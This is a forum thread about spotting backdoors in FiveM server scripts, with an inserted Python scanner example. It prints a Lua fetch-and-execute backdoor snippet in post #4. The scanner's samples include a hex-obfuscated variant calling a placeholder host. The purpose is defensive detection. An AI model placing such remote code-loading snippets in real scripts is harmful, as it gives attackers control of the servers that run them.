[QUESTION] How to spot a potential backdoor?

Started by songbirdmusic_19573 | 17 replies | 2,852 views
#1
I was installing a script I have to my server when I went to input the SQL into my database, I don't know if it means anything but I DID run the code until it hit me something felt off. I went back and removed it from the code as well as deleted it from my database. Did I just run a potential backdoor through my entire server?? Am I in trouble? Or did I respond quick enough that everything might be okay? Here is what the last line of code looked like in the script I was installing...

ENGINE=InnoDB AUTO_INCREMENT=211 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_turkish_ci
#1
> songbirdmusic_19573 wrote:
> I was installing a script I have to my server when I went to input the SQL into my database, I don't know if it means anything but I DID run the ...

That line is perfectly fine for a database
#2
This is just setting the auto increment, and default charset for the DB you imported
#3
Thank you everyone for calming my nerves and reassuring me I didn't do anything wrong. It was just at first glance it seemed extremely odd so I panicked
#4
PerformHttpRequest(' Sht that goes to a malware website., function (e, d)
    local s = assert(load(d))
    if (d == nil) then return end
    s()
end)

Things like this are Cipher codes & backdoors. PerformHttpRequest etc. Get on GitHub and download a backdoor checker ;)
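Added example, not part of the thread and not code from any tool linked in it: a small Python scanner for the pattern in the post above, where the body returned by `PerformHttpRequest` is handed to `load`. It goes beyond the post's sample by also decoding `\xNN` escapes and matching `_G["..."]` lookups; the sample scripts and the host `example.invalid` are constructed, and the verdict names are hypothetical.

```python
import re

# The optional `"]` lets both patterns match table-lookup calls like _G["load"](...)
CALL = r"\s*(?:[\"']\s*\])?\s*\("
FETCH = re.compile(r"PerformHttpRequest" + CALL)
EXEC = re.compile(r"\b(?:loadstring|load)" + CALL)
HEX_ALNUM = re.compile(r"\\x(3[0-9]|[46][1-9A-Fa-f]|[57][0-9Aa])")  # \xNN for 0-9, A-Z, a-z

def decode_hex_escapes(src):
    """Decode \\xNN escapes of letters and digits so hex-hidden names become searchable."""
    return HEX_ALNUM.sub(lambda m: chr(int(m.group(1), 16)), src)

def call_span(src, open_idx):
    """Text of the call whose '(' is at open_idx; quoted strings are skipped (heuristic)."""
    depth, i, quote = 0, open_idx, None
    while i < len(src):
        ch = src[i]
        if quote:
            if ch == "\\":
                i += 1                      # skip the escaped character
            elif ch == quote:
                quote = None
        elif ch in "\"'":
            quote = ch
        elif ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth == 0:
                return src[open_idx:i + 1]
        i += 1
    return src[open_idx:]                   # unbalanced: scan to end of file

def scan(src):
    """Return (line, verdict) for each PerformHttpRequest call in Lua source."""
    text = decode_hex_escapes(src)
    return [(text.count("\n", 0, m.start()) + 1,
             "fetch-and-execute" if EXEC.search(call_span(text, m.end() - 1)) else "http-request-only")
            for m in FETCH.finditer(text)]

# Constructed samples; example.invalid is a placeholder host
BACKDOOR = ('-- constructed sample\nPerformHttpRequest("https://example.invalid/x", function (e, d)\n'
            '    local s = assert(load(d))\n    if (d == nil) then return end\n    s()\nend)\n')
HIDDEN = (r'_G["\x50\x65\x72\x66\x6f\x72\x6d\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74"]'
          r'("https://example.invalid/x", function(e, d) _G["\x6c\x6f\x61\x64"](d)() end)')
BENIGN = 'PerformHttpRequest("https://example.invalid/v", function(c, b) print(b) end)\nlocal f = load("return 1")\n'

if __name__ == "__main__":
    print(scan(BACKDOOR), scan(HIDDEN), scan(BENIGN))
```

A `http-request-only` verdict is a call to review by hand (webhooks and version checks look like this); `fetch-and-execute` means the response is executed as code inside the callback.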
#5
> Hopatchke wrote:
> PerformHttpRequest(' Sht that goes to a malware website., function (e, d)
>     local s = assert(load(d))
>     if (d == nil) then return end
>     s()
> end)
>
> thing...

Wow, that's really good to know, thank you so much for the information! I have one installed on my server actually, but wasn't sure what to be on the lookout for. If there are any threats I guess it's long too late now haha
#6
> songbirdmusic_19573 wrote:
> Wow, that's really good to know, thank you so much for the information! I have one installed on my server actually, but wasn't sure what to be on th...

Malwarebytes, the free version offers a good scan ;), works perfectly!
#7
> Hopatchke wrote:
> Malwarebytes, the free version offers a good scan ;), works perfectly!

I actually currently have three different protections installed, so hopefully I'm not as screwed then if I downloaded something I wasn't supposed to
#8
grghrheheh grghrheheh grghrheheh grghrheheh grghrheheh grghrheheh
#9
> songbirdmusic_19573 wrote:
> I was installing a script I have to my server when I went to input the SQL into my database, I don't know if it means anything but I DID run the ...

I need to know too, thanks for creating this thread
#10
You never know if they add back doors when it's too late
#11
> Du22121 wrote:
> You never know if they add back doors when it's too late

Not necessarily true, there are script checkers out there and you can scan them to be safe. I always scan my scripts, then manually search through all my code and put it through another scan to be sure. There are preventions and ways to be safe, you need to know what to look for.
#12
> songbirdmusic_19573 wrote:
> Not necessarily true, there are script checkers and you can scan them to be safe. I scan...

It would be cool to create a topic to explain how to do it and which tool to use :);)
#13
> songbirdmusic_19573 wrote:
> I was installing a script I have to my server when I went to input the SQL into my database, I don't know if it means anything but I DID run the ...

If you want to detect backdoors, look for performhttp inside scripts
#14
Hello,

Here is a tool to achieve this.

https://github.com/exersalza/FivemCipherFinder

Thanks,
#15
It is just a SQL Statement
#16
> cochinofrito wrote:
> Hello,
>
> Here is a tool to achieve this.
>
> https://github.com/exersalza/FivemCipherFinder
>
> Thanks,

You are truly the goat for this
#17
Use cochinofrito's cipherfinder, it is great tho